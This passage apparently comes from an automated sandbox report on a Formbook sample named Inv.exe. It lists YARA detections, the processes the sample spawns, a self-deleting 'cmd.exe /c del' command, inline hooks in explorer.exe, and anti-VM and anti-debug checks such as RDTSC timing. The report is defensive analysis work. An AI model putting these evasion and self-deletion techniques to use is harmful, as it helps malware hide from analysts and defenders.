          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01237021 appears 40 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0194B150 appears 35 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0123715C appears 370 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02E1B150 appears 66 times
          Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
          Source: Inv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@7/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO1_2_01231040
          Source: Inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Inv.exeVirustotal: Detection: 39%
          Source: Inv.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\Inv.exeFile read: C:\Users\user\Desktop\Inv.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inv.exeProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'Jump to behavior
          Source: Inv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012391A5 push ecx; ret 0_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0DB push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D13C push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D1EF push ebp; ret 1_2_0041D6FD
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040F345 push edi; retf 1_2_0040F34C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041E7C6 push edx; ret 1_2_0041E83E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012391A5 push ecx; ret 1_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0199D0D1 push ecx; ret 1_2_0199D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E6D0D1 push ecx; ret 4_2_02E6D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D085 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0D2 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0DB push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D13C push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D1EF push ebp; ret 4_2_0036D6FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036DA9F push cs; iretd 4_2_0036DAAE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0035F345 push edi; retf 4_2_0035F34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036E7C6 push edx; ret 4_2_0036E83E

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Inv.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6700Thread sleep count: 65 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6700Thread sleep time: -130000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576Thread sleep count: 43 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576Thread sleep time: -86000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Inv.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,De